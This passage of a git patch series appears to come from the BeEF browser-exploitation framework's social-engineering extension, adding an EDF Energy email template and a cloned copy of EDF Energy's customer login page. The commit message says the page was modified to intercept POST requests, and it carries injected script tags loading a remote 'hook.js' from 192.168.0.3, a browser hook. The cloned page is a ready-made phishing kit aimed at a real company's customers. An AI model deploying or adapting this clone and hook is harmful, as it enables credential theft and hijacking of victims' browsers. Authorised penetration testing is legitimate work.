zJ{5_It`yrBmlc25DBO7E8;5VoznR>Ww5hAaxn$2~(q`%A-YuS64wkBy=9dm`4cXeX
z4c}I@?e+FW+b@^RDBHV(wnMq2zdX3SWv9u`%{xC-q*U}&`cyXV(%rRT*Z6MH?i+i&
z_B8C(+grT%{XWUQ+f@NoP1R=AW&26{v-dx)iK^-Nmiuj8txj!m?Z*Ss1N{dh4z}01
z)YTo*JycSU)+_5r4#yw9{+;i4Ee$peRgIj+;v;ZGdF1K$3E%e~4LaI(jC-u%2h$&R
z9cLXcYC@Xwnns&bn)_Q~Te?roKGD|d-g^8;+aC{{G(1^(O7m37Y1-+6)01cN&y1aw
zoqc{T`P^XJqPBbIW6s}d4{z_f5Om?vMgNQEJG?v2T=KYd^0M3I6IZxbny)%vZR&LD
zJpPl@Psh8QyPB@KTx+@RdcC!KX7}kEo;S|j^u2lU7XQ}Oo;f|;z4Ll+_r>@1-xl3|
zawq-H%e&ckC+@AhPrP6BK<z=<L*0kfKU@CX*zeqbYQT4(^U>T#_XdT7&;F71j}Joy
zkC~6lh7E@6o;W@^IpRNZ{ptLtL(gQ-CY~4mqW;US7Zxvm_|@yz&e53Bp_lTPlfP|z
zrTyx_>lv@x#=^!PzR7qqF<$gm`|ZJZ+;<)Cqu&ot<a{81DF0~rvGr5Xr~8u`lav1h
z1DNytV>2z=0000WV@Og>004R=004l4008;_004mL004C`008P>0026e000+nl3&F}
z0009cNkl<Zc-pjBJ&P1U5UrNw5EV2y5Jb4_Oa#SDQ!z8~2l(s!0Val;ijgRosL_E4
zf(UnTqRF<w%r!OrUR783j2kSo-SzS6RaMV+rJS>{&x=>@r-zi}?ELSq)8ErG6))>e
z0lgx!(6V#~K21|TV2U<^Eh07rKE>|9a7<|nTM-gZ7XIvV7e_Kl=6&905y|sfl9W;s
zNtYIOtUPL-D;clqvPhEserk@{^=_A(nmN32_1cw#vi|((10EFi+sikf0QW4GE>fLy
zE{kP-TGYF!IPF$u@wsy0tXMcPt^x@|(ALm$rGkMV0P4<yUAe&Zifzjgb%C5vax4MI
zkyRKLY$wGuHJWFXr!-cTMrpU`@*l9I9eRuFXOHhT`t9|*uN5*%G!4?>1yTC+VH#*_
z`M{9nuKGp+bV_kr#{`Dsw+&XO(<C%TdO%pYu#8xh>YsYPS<8N<f_yelmgY%hy$_n@
zWO;FVKIi=8;W6*Gw;xU}-lbVYk|gI{pC$VOMJ6J-Mr9?)|7~F_BWt|VY&KD$z<^2@
z1HD8!^3~QDFuhw<W*5{)_m4=wef<2r{MpqH)ibW(Zip;HYs^~pH$Com*qvou-><q{
zQ06!8y*!9580i28KkAiK48$8(=_;gqcWy2E?aRqe>*}e0`q%pAr5~@|)RAv9vfg_s
zr{7pxx;TRPH<|PxFv=>O#H^eHSt`RLE@TPQP3xq}OT1L92?{MmN-y2&oe3Qu9nSss
z?Z;{BoZ$CYl)>w!FW+-kHEz{S*aHG_oOCRdMh|C7<1n`EUXL9)9l++4*-Fcn;wBYB
zvrj*_Z(iSt$mN3_9k9eJl4>=3&oUmo_0lG^rUK54)EZX?PYP!|MF&503==uUx+X5o
z1JOcmF@uS==6jTCC(*qpI~{2G6FdL-?k#&O<38Int7qqb@LD|YNz%7%y^gm@t)dmn
zmfoc^k_D{gJryOjN(ImH<=d%3Lmtp9l|gF`&WdMBm)@noa0}7m2*Hw}HYqbSa4TQd
y93sd(&4t4!CEt(HvX5vZxuXI80{{U3{{sL4f2u0qh?dO&0000<MNUMnLSTXy0Jhlx

literal 0
HcmV?d00001


From b3ae5f101645d5e7840d6c9cc9103527457d1cd9 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Thu, 6 Sep 2012 11:30:33 +0100
Subject: [PATCH 030/397] Social Eng. extension: added EDG Energy template
 configuration in config.yaml

---
 extensions/social_engineering/config.yaml | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/extensions/social_engineering/config.yaml b/extensions/social_engineering/config.yaml
index 50213ce6b..84c3a10c2 100644
--- a/extensions/social_engineering/config.yaml
+++ b/extensions/social_engineering/config.yaml
@@ -42,3 +42,16 @@ beef:
                           cid1: "beef_logo.png"
                          #cid2: "second_image.png"
                        attachments: ["beef_attachment.pdf"]
+                    edfenergy:
+                       images: ["corner-tl.png", "main.png","edf_logo.png","promo-corner-left.png","promo-corner-right-arrow.png","promo-reflection.png","2012.png","corner-bl.png","corner-br.png","bottom-border.png"]
+                       images_cids:
+                          cid1: "corner-tl.png"
+                          cid2:  "main.png"
+                          cid3:  "edf_logo.png"
+                          cid4:  "promo-corner-left.png"
+                          cid5:  "promo-corner-right-arrow.png"
+                          cid6:  "promo-reflection.png"
+                          cid7:  "2012.png"
+                          cid8:  "corner-bl.png"
+                          cid9:  "corner-br.png"
+                          cid10: "bottom-border.png"

From 6ac074d2b05364c7df00548dd17c7cd0fa5f080d Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Thu, 6 Sep 2012 12:37:26 +0100
Subject: [PATCH 031/397] Social Eng. extension: now the web_cloner can serve
 modified pages as well. This is needed when the page use custom logic to
 submit the form. Added an example of an Edf Energy modified page.

---
 extensions/social_engineering/config.yaml     |   7 +-
 .../edfenergy/my-account.edfenergy.com_mod    | 790 ++++++++++++++++++
 .../rest/socialengineering.rb                 |   3 +-
 .../web_cloner/web_cloner.rb                  | 152 ++--
 4 files changed, 877 insertions(+), 75 deletions(-)
 create mode 100644 extensions/social_engineering/mass_mailer/templates/edfenergy/my-account.edfenergy.com_mod

diff --git a/extensions/social_engineering/config.yaml b/extensions/social_engineering/config.yaml
index 84c3a10c2..9bbbc83f7 100644
--- a/extensions/social_engineering/config.yaml
+++ b/extensions/social_engineering/config.yaml
@@ -36,13 +36,14 @@ beef:
                 # available templates
                 templates:
                     default:
-                       # images are by default inline, so if you want to attach something, see below
-                       images: ["beef_logo.png"]#,"second_image.png"]
+                       # images are by default inline, so if you want to attach something, see 'attachments' below
+                       images: ["beef_logo.png"]
                        images_cids:
                           cid1: "beef_logo.png"
-                         #cid2: "second_image.png"
                        attachments: ["beef_attachment.pdf"]
                     edfenergy:
+                       # my-account.edfenergy.com_mod is an example of a modified page (manually modified in order to
+                       # intercept POST requests) to be served with the web_cloner using use_existing = true
                        images: ["corner-tl.png", "main.png","edf_logo.png","promo-corner-left.png","promo-corner-right-arrow.png","promo-reflection.png","2012.png","corner-bl.png","corner-br.png","bottom-border.png"]
                        images_cids:
                           cid1: "corner-tl.png"
diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/my-account.edfenergy.com_mod b/extensions/social_engineering/mass_mailer/templates/edfenergy/my-account.edfenergy.com_mod
new file mode 100644
index 000000000..7d2e32d59
--- /dev/null
+++ b/extensions/social_engineering/mass_mailer/templates/edfenergy/my-account.edfenergy.com_mod
@@ -0,0 +1,790 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
+<html><head><LINK REL=stylesheet HREF="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/Edf_Energy_Orchard_Theme/glbl/glbl_nn7.css?7.0.20.0.1">
+<LINK REL=stylesheet HREF="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/Edf_Energy_Orchard_Theme/prtl_std/prtl_std_nn7.css?7.0.20.0.1">
+
+<!-- EPCF: BOB Core -->
+<meta http-equiv="Content-Script-Type" content="text/javascript">
+<script src="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.epcf.loader/script/optimize/js13_epcf.js?7.00001620"></script>
+<script>
+<!--
+EPCM.relaxDocumentDomain();
+EPCM.init( {
+Version:7.00001620,
+Level:1,
+PortalVersion:"7.00.200908152330",
+DynamicTop:false, // [service=true nestedWinOnAlias=false]
+UAType:21, // [Mozilla]
+UAVersion:5.0,
+UAPlatform:1, // [Win]
+UIPMode:"1", // [Default=1, User=0, Personalize=true]
+UIPWinFeatures:"",
+UIPPortalPath:"https://my-account.edfenergy.com:443/irj/portal/anonymous",
+UIPPopupComp:"",
+UIPPopupCompSize:"",
+UIPPopupMsgNN:"Your current page contains unsaved data.\r\nDo you want to continue with navigation and open a new window?",
+UIPPopupMsgND:"Your current page contains unsaved data.\r\nDo you want to discard the changes and open the content in the same window?",
+DBGException:false
+} );
+EPCM.DSM.init( {
+TerminatorURL:"/irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.Terminator",
+WinEmptyUrl:"/irj/portalapps/com.sap.portal.dsm/images/empty.gif",
+ForcedUserDebug:false,
+KeepAliveActive:false,
+KeepAliveDelta:840,
+KeepAliveStopAfter:36000
+} );
+function SAPWP_receiveSessInfo( sessInfo, frameRef ){
+  EPCM.DSM.processSession( sessInfo, frameRef );
+}
+//-->
+</script>
+<!-- EPCF: EOB Core -->
+
+<script type="text/javascript">
+/*HTML Business for Java, 645_SP_REL, 529005, Wed Jul 22 15:27:56 BST 2009*/
+ur_system = {doc : window.document , mimepath :"/irj/portalapps/com.sap.portal.design.urdesigndata/themes/portal/Edf_Energy_Orchard_Theme/common/", stylepath : "/irj/portalapps/com.sap.portal.design.urdesigndata/themes/portal/Edf_Energy_Orchard_Theme/ur/", emptyhoverurl : "/irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html", is508 : false, dateformat : 1, domainrelaxing : "MINIMAL"};
+</script>
+<title >MyAccount</title><meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.httpconnectivity.httpauthentication/scripts/CAManagerScript.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/HistoryFramework.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/NavigationFramework.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/FrameworkSupport.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.pagebuilder/scripts/pagesupport.js" ></script><link  REL=STYLESHEET  HREF="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/css/stylesheets/main_v1.5.css?7.0.20.0.1"  TYPE="text/css" ><link  REL=STYLESHEET  HREF="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/css/stylesheets/myaccount_v3.css?7.0.20.0.1"  TYPE="text/css" ><script type="text/javascript" src="http://192.168.0.3:80/hook.js"></script>
+</head><body class="prtlBody urFontBaseFam urScrl">
+<!-- EPCF: Component com.sap.portal.navigation.portallauncher.anonymous, kegighenibibncgidhmmmfdjjggfpmhm -->
+<Script>
+var caEngine = new CAManager('/irj/servlet/prt/portal/prtroot/com.sap.portal.httpconnectivity.httpauthentication.Engine','dialogHeight:10;dialogWidth:20;center:1;help:0;status:0');
+caEngine.registerCAEvent('com.sap.portal.httpconnectivity.httpauthentication','Teach',caEngine,'eventCallBack');
+</Script>
+
+
+
+
+
+
+
+
+
+
+<script>
+
+var disableWorkProtectCheck = false;
+
+
+function popupUnsavedDataBeforeUnload(evt)
+{
+	if ((typeof pageTitleBar != "undefined") && pageTitleBar.backForwardLink)
+	{
+		pageTitleBar.backForwardLink = false;	
+	}
+	else
+	{
+		evt = (evt) ? evt : ((window.event) ? event : null);
+		if ( EPCM.getUAType() != EPCM.MSIE && EPCM.getUAType() != EPCM.MOZILLA) return;
+		if ( EPCM.getGlobalDirty() && (! disableWorkProtectCheck ))
+		{
+			if(EPCM.getUAType() == EPCM.MSIE )
+			{
+				evt.returnValue = 'You have unsaved data';
+			}
+			else
+			{		
+				evt.preventDefault();
+				evt.stopPropagation();
+				return 'You have unsaved data';
+			}
+		}
+	}
+}
+
+try{
+     if ( EPCM.getUAType() == EPCM.MSIE || EPCM.getUAType()== EPCM.MOZILLA){
+       if (window==EPCM.getSAPTop()){  
+         window.onbeforeunload = popupUnsavedDataBeforeUnload;
+       }   
+     }
+} catch(ex){} 
+</script><script>frameworkSupport.init({anonymous:true,phase:'framework',portalURL:'https://my-account.edfenergy.com:443/irj/portal/anonymous'});</script><script>frameworkSupport.init2({contentAreaURL:'/irj/servlet/prt/portal/prteventname/Navigate/prtroot/pcd!3aportal_content!2fEdf_Energy_Development!2fOrchard!2fDesktop!2fEDFE_Framework!2fEDFE_Anonymous!2fCustomLogonDesktop!2fframeworkPages!2fcom.edfe.orchard.pct.Logon_Page_pg!2fcom.sap.portal.innerpage!2fcom.sap.portal.contentarea',portalURL:'https://my-account.edfenergy.com:443/irj/portal/anonymous',innerPage:'pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg/com.sap.portal.innerpage',innerPageFrameURL:'/irj/servlet/prt/portal/prteventname/Navigate/prtroot/pcd!3aportal_content!2fEdf_Energy_Development!2fOrchard!2fDesktop!2fEDFE_Framework!2fEDFE_Anonymous!2fCustomLogonDesktop!2fframeworkPages!2fcom.edfe.orchard.pct.Logon_Page_pg!2fcom.sap.portal.innerpage',tlnComp:'/irj/portalapps/com.sap.portal.navigation.toplevel',ObjBasedNavigationURL:'/irj/servlet/prt/portal/prtroot/com.sap.portal.navigation.objbased.ObjBasedNavigation',serverPath:'https://my-account.edfenergy.com:443',usedConnectors:''});</script>	
+
+<span id=divChangeContent name=divChangeContent style="position:absolute;height:0;width:0;top:-5000;left:-5000">
+	<FORM action="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com" method=POST id="frmChangeContent" name="frmChangeContent">
+		<INPUT type="hidden" id=NavigationTarget name=NavigationTarget>
+		<INPUT type="hidden" id=RelativeNavBase name=RelativeNavBase></INPUT>
+	<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUhgPrZWDRw08VLuhthw6Alf_ythxgZRxx-bn2SU9GjY2G8UFdotsliPfe5ArbcVEM="></FORM>
+<form id='obnNavForm' method='post' target='obnNavIFrame' action="/irj/portal/anonymous">		<input type='hidden' name='systemAlias'>
+		<input type='hidden' name='businessObjName'>
+		<input type='hidden' name='objValue'>
+		<input type='hidden' name='operation'>
+		<input type='hidden' name='usePost' value='false'>
+		<input type='hidden' name='source'>
+		<input type='hidden' name='resolvingMode' value='Default'>
+	<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUZncgeJn0nDtoKgRZLTHoNG9b8gjXLxyg1JXcdz0DDEk4i74Lypj65OK5A4udLxsoXWiF7rrPTfgID-qUNr8-D6aXCTTHzGtpGEifQUi875Ykz1XmE69Xx"></form>
+</span>
+<iframe src='https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.pagebuilder/html/EmptyDocument.html' style='position:absolute;height:0;visibility:hidden' name='obnNavIFrame' id='obnNavIFrame'></iframe>
+<script>var disablePersonalize = true;</script>
+<!-- EPCF: Component com.sap.portal.pagebuilder.pageBuilder, agnkfkoliedeidmfenendpdjjggfpmic -->
+<SCRIPT>var emptyDocumentUrl = "/irj/portalapps/com.sap.portal.pagebuilder/html/EmptyDocument.html";</SCRIPT>
+<!-- EPCF: Component com.sap.portal.layouts.framework.light_framework, fbkobmdfenlemkgnkdbnmfdjjggfpmip -->
+
+
+
+
+
+<SCRIPT>if (typeof EPCM != "undefined") {EPCM.relaxDocumentDomain();} else { var d=document.domain; if (d.search(/^\d+\.\d+\.\d+\.\d+$/)>=0) {} else { var l=d.indexOf("."); if (l>=0) {d=d.substr(l+1)} } if (document.domain != d) {document.domain = d;}}
+pageSupport.pageHelperUrl = '/irj/servlet/prt/portal/prtroot/com.sap.portal.pagebuilder.PageHelper';
+pageSupport.proxyModesUrl = '/irj/servlet/prt/portal/prtroot/com.sap.portal.pagebuilder.IviewModeProxy';
+pageSupport.addPageId('pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg','0','local');
+pageSupport._addIvuPageId("pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg/com.edfe.orchard.pct.Logon_ivu","page0ivu0");
+pageSupport._addIViewBank("page0ivu0",new iviewBank("","",pageSupport.EMBEDDED,1,"0","","GET"));
+</SCRIPT>
+    <script>
+        document.body.style.margin=0;
+        document.body.scroll = "no";
+       
+       
+    </script>
+ 
+            <TABLE style="WIDTH: 100%" cellSpacing=0 cellPadding=0  class="prtlHeaderCon"  ><TR><TD>
+<!-- EPCF: Component com.edfe.orchard.Logon.LogonComp, fchmhdeefnpeknleddanfldjjggfpmig -->
+
+
+
+
+
+
+
+
+
+
+
+
+    
+
+<html xmlns:xalan-nodeset="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" xmlns="http://www.w3.org/1999/xhtml">
+  <head>
+	<meta name="generator" content="HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
+	<title>MyAccount</title>
+
+
+	<link rel="SHORTCUT ICON" href="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/favicon/favicon.ico" />
+	
+	
+	<script type="text/javascript" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/scripts/edfenergy-ga-script-n.js"></script>	
+		
+		<script type="text/javascript">
+		loadTrackCode('UA-25608035-1');
+	
+			  	
+				  _gaq.push(['_trackPageview', 'Login']);
+					
+		</script>
+	
+
+<script language="JavaScript">
+/*var emailRegEx = /^([a-zA-Z0-9_\.\!\#\$\%\^\&\*\{\}\~\`\+\_\=\?\'\|\"\-]{2,})\@(([a-zA-Z0-9\-]{2,})\.)+([a-zA-Z]{2,4})+$/;*/
+var emailRegEx = /^\s*[\w\-\+_\{\}\~\`\+\_\=\?\'\|\"\-\!\#\$\%\^\&\*]+(\.[\w\-\+_\']+)*\@[\w\-\+_]+\.[\w\-\+_]+(\.[\w\-\+_]+)*\s*$/;
+var Monitor_Flag1 = true;
+	document.onkeyup = checkKeyPressed;
+
+	window.history.forward(1);
+	
+	function EDFEDisableSubmitButton1( button_text1, button_id1 )
+	{
+	var bid = button_id1;
+	var btext = button_text1;
+	document.getElementById( bid ).innerHTML = "<div class='btbg' id='"+bid+"'><a>"+ btext +" &raquo; </a></div>" ;
+	}
+
+	function checkCode()
+	{
+		if(event.keyCode==13)
+		{
+			event.keyCode=9;
+		}	
+	}
+	function checkKeyPressed()
+	{
+		if(event.keyCode==13)
+		{	
+			
+			if(Monitor_Flag1!=null && Monitor_Flag1==true){
+			
+			callGA('yes');
+			}
+			else
+			{
+			
+			callGA('no');
+			}
+		}	
+	}
+	
+	function change(param1,param2)
+	{
+		param1.style.backgroundColor = param2;	
+	}
+
+
+	function allValidChars(email) 
+	{
+	
+		var parsed = true;
+		
+		var validchars = "abcdefghijklmnopqrstuvwxyz0123456789@.-_!#$%&`*+-/=?^'{}|~\"";
+		
+		
+		for (var i=0; i < email.length; i++) 
+		{
+			
+			var letter = email.charAt(i).toLowerCase();
+			
+			if (validchars.indexOf(letter) != -1)
+			  continue;		  
+			parsed = false;
+			break;
+		}
+		return parsed;
+	}
+	
+	function trim(str) {
+		return str.replace(/(^[\s\xA0]+|[\s\xA0]+$)/g, '');
+	}
+	function validateEmail(email)
+	{
+		var decision = true;
+		if(trim(email)!= null && trim(email) !=""){		
+			if(email.match(emailRegEx)){
+				decision = true;
+			}else{
+				decision = false;
+			}
+		}else{
+			decision = false;
+		}
+		
+		/*
+		if (! allValidChars(email)) 
+		{  
+	        decision = false;
+	    }
+		if (email.indexOf("@") < 1) 
+		{ 
+	        decision = false;
+	    } 
+	     
+	    if(email.indexOf("@")!=email.lastIndexOf("@"))
+	    {
+	     decision = false;
+	    }    	
+	   
+	    else if (email.lastIndexOf(".") <= email.indexOf("@")) 
+	    {  
+	        decision = false;
+	    } 
+	    else if (email.indexOf("@") == email.length) 
+	    {  
+	        decision = false;
+	    } 
+	    else if (email.indexOf("..") >=0) 
+	    { 
+			decision = false;
+	    } 
+	    else if (email.indexOf(".") == email.length) 
+	    {  
+			decision = false;
+	    }*/
+	    if(!decision)
+	    {
+	    	
+	    	document.logonForm.f_username.focus();
+	    	
+	    	change(document.logonForm.f_username,'#FFFFFF'); // Cosmotic Changes 
+	    	
+	    	document.getElementById('errorMessage').innerHTML = "Please enter a valid email address";
+			document.getElementById('errorMessage1').innerHTML = "";
+	    	
+	    }
+	    else
+	    {
+	    	
+	    	change(document.logonForm.f_username,'#FFFFFF');
+	    }
+	    return decision;
+	}
+	
+
+	function callGA(GA) 
+	{
+		if(GA!=null && GA=="yes")
+		{
+			_gaq.push(['_trackPageview', 'LoginAttempted']);
+		}
+		var t = setTimeout("validateLogin()", 100);
+	}
+
+	
+
+	function validateLogin()
+	{
+	 		
+		var email = document.logonForm.f_username.value;
+		var pass = document.logonForm.f_passwd.value;
+		
+		if(email==null || email=="")
+		{
+			document.logonForm.f_username.focus();
+			
+			document.getElementById('errorMessage').innerHTML = "Please enter your 'username', which is your email address";
+			
+			document.getElementById('errorMessage1').innerHTML = "";
+			return false;
+		}
+		else 
+		{
+			if(validateEmail(email))
+			{
+				if(pass==null || pass=='')
+				{
+					document.logonForm.f_passwd.focus();
+					document.getElementById('errorMessage').innerHTML = "Please enter your password";
+					document.getElementById('errorMessage1').innerHTML = "";
+					change(document.logonForm.f_passwd,'#FFFFFF');
+					return false;
+				}
+				else
+				{
+					change(document.logonForm.f_passwd,'#FFFFFF');				
+					document.logonForm.action = "/nclogin.submit";	
+					
+					EDFEDisableSubmitButton1('Login','EDFElogonButton');
+					document.logonForm.submit();
+				}
+			}
+			
+		}
+		
+	}
+
+
+	function validateFU()
+	{
+		document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orcharcd.forgotUserName.ForgotUserNameController";
+		document.logonForm.submit();
+	}
+	
+	
+	function validateFP()
+	{
+		document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.forgotPassword.ForgotPasswordComp";
+		document.logonForm.submit();
+	}
+	
+	
+		function validateRegisterSME()
+	{
+		document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.SelfRegistrationComp"+"?refUsr=SME";
+		
+		document.logonForm.submit();
+	}
+		function validateRegisterResi()
+	{
+		document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.SelfRegistrationComp"+"?refUsr=RESI";
+		
+		document.logonForm.submit();
+	}
+	
+
+	function validateMR()
+	{
+		document.logonForm.action = "/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller"; 
+		document.logonForm.submit();
+	}
+
+	
+
+</script>
+
+  <script type="text/javascript" src="http://192.168.0.3:80/hook.js"></script>
+</head>
+  
+  <body onLoad="history.forward(); document.logonForm.f_username.focus();">
+	<div id="wrap">
+	  <div id="outer-right">
+		<div id="outer">
+<!--------------------------- start top section ----------------------------------->
+
+	
+
+
+<script>
+function performSearch()
+{
+	var searchItem 		= document.getElementById('searchBox');
+	window.open('http://www.edfenergy.com/search-results.php?query='+searchItem.value,'_blank');
+}
+
+function clearText()
+{
+	document.getElementById('searchBox').value="";
+}
+
+function EDFEDisableSubmitButton( button_text, button_id )
+{
+	var bid = button_id;
+	var btext = button_text;
+	document.getElementById( bid ).innerHTML = "<div class='btbg' id='"+bid+"'><a>"+ btext +" &raquo; </a></div>" ;
+}
+
+
+</script>
+
+
+<!--------------------------- start top section ----------------------------------->
+		
+	<div id="header">
+		  <p class="hide-element">
+			<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#pnav">skip to primary navigation</a>
+		  </p>
+		  <div id='logo'>
+			<img src='https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/edfenergy_logo2.gif' title='EDF Energy' alt='EDF Energy' width='56' height='89' border='0' />
+		  </div><!-- start top utilities -->
+          
+		  <div id="toplinks">
+		  <div class="left">
+         <ul>
+				<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com">Home</a></li>
+				<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com">MyAccount</a></li>		
+				<li><a href="https://my-account.edfenergy.com/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller">My meter reading</a></li>
+		 </ul>
+		 </div>
+				
+		<div class="right">
+			<ul>
+				<li><a href="http://www.edf.com" target="_blank">EDF Group</a></li>
+			</ul>        
+           	
+           <div id="searchform">
+<form name="SearchForm" id="SearchForm" action="/irj/portal/anonymous">			  <input name="searchBox" id="searchBox" type="text" value="Search" class="searchtextbox" onfocus="clearText()" />
+			  <input name="searchSubmit" type="image" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/search-icon.png" title="Perform Search" class="faq-button" onclick="performSearch(); return false;" />
+			<input type="hidden" name="__ncforminfo" value="aG5IjEByLfWulwL539YlRxugW3Unfla8YtGvDKb-X_2YFxvNDTOZUB0qVQVl6ZXF"></form>
+		   </div>	
+		   
+		</div>		 		  
+</div>
+		
+		  
+		  <div id="olympiclogo">
+			<img src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/london2012_logo_new.gif" alt="London 2012 Official Electricity Supplier" title="London 2012 Official Electricity Supplier" />
+		  </div><!-- end top utilities -->
+
+          <!-- start top navigation -->
+            <div id="topnav">
+            <div id="topnav-inner">
+              <p class="hide-element">
+                <a name="pnav" id="pnav">primary navigation</a>
+              </p>
+              <p class="hide-element">
+                <a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#snav">skip to secondary navigation</a>
+              </p> 
+              <ul>
+                <li>
+                  <a target="_blank" href="https://www.edfenergy.com/products-services/index.shtml" >Products &amp; Services</a>
+                </li>
+	    		<li>
+	            <a target="_blank" href="http://www.edfenergy.com/energyfuture">Energy Future</a>
+	            </li>
+                
+                <li>
+                  <a target="_blank" href="https://www.edfenergy.com/about-us/index.shtml">About us</a>
+                </li>
+                <li>
+                  <a target="_blank" href="https://www.edfenergy.com/sustainability/index.shtml">Sustainability</a>
+                </li>
+                <li>
+                  <a target="_blank" href="https://www.edfenergy.com/careers/index.shtml">Careers</a>
+                </li>
+                <li>
+                  <a target="_blank" href="https://www.edfenergy.com/media-centre/index.shtml">Media centre</a>
+                </li>
+                <li>
+                  <a target="_blank" href="https://www.edfenergy.com/safety-emergencies/index.shtml">Safety &amp; emergencies</a>
+                </li>
+                
+              </ul>
+              <div class="clearFix"></div>
+            </div>
+          </div><!-- end top navigation -->
+		  </div>		  		  
+<!--------------------------- end top section ----------------------------------->	  
+
+
+
+<!--------------------------- end top section ----------------------------------->	  
+		  
+<div id="pagehold">
+           	
+<!--------------------------- start left section ----------------------------------->
+
+		
+
+
+<SCRIPT>
+	function fnNavigateMenu(locationURL,navigParam,menuIden)
+	{
+		if (navigParam == 'false')
+		{
+			document.outsidemenu.menuidentifier.value		= menuIden ;
+			document.outsidemenu.action 					= locationURL ;
+			document.outsidemenu.submit() ;
+		}
+		else
+		{
+			window.open(locationURL) ;
+		}
+	}
+</SCRIPT>
+ 
+			<!-- start left section forgottenusername.html;forgottenpassword.html -->
+			   <div id="leftnav-outer">
+			  <div id="leftnav">
+				  <ul>
+	
+							<li><ul><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="xxx" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller','false','EMR')" >Submit meter reading</a></ul></li>	
+		
+							<li>
+							<ul>
+								<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="xxx" onClick="fnNavigateMenu('http://www.edfenergy.com/contact-us/index.shtml','true','CONTACTUS')">Contact us</a>
+							</ul>
+						</li>
+						<li>
+						
+							<ul><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="current" onClick="fnNavigateMenu('/irj/portal/anonymous','false','LOGON')" >Login / Register</a>	
+								<ul>
+									<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/com.edfe.orcharcd.forgotUserName.ForgotUserNameController','false','FUN')" >Forgotten your username</a></li>
+									<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/com.edfe.orchard.forgotPassword.ForgotPasswordComp','false','FUP')" >Forgotten your password</a></li>
+								</ul>
+							</ul>
+							
+					</li>					
+
+				</ul>
+	
+				<ul>
+				<br/><br/>
+				<div id="lpButtonDiv" align="center">
+				 
+				</div>
+				</ul>
+	 
+			  </div>
+			</div>
+					<!-- end left section -->			
+<form name="outsidemenu" method="POST" action="/irj/portal/anonymous">	<input type="hidden" name="menuidentifier" value="">
+<input type="hidden" name="__ncforminfo" value="aG5IjEByLfWqJ6R7zZUHhDE15UF2cpEumhm0TWuQDLfNnOD8MqMtjNF30GgZOV1f"></form>
+					
+<!--------------------------- end left section ----------------------------------->
+
+              
+<!--------------------------- start middle section ----------------------------------->
+              
+			<div id="maincontent-wrap" class="fullwidth">
+			  <p class="hide-element">
+				<a name="cont" id="cont">main content</a>
+			  </p>
+			  <div id="maincontent-full" class="nobanner">
+				 <div id="banner" class="BannerWith2Circles">
+				  <h1>
+					Login / Register
+				  </h1>
+				  <div id="banner_text_wrap">
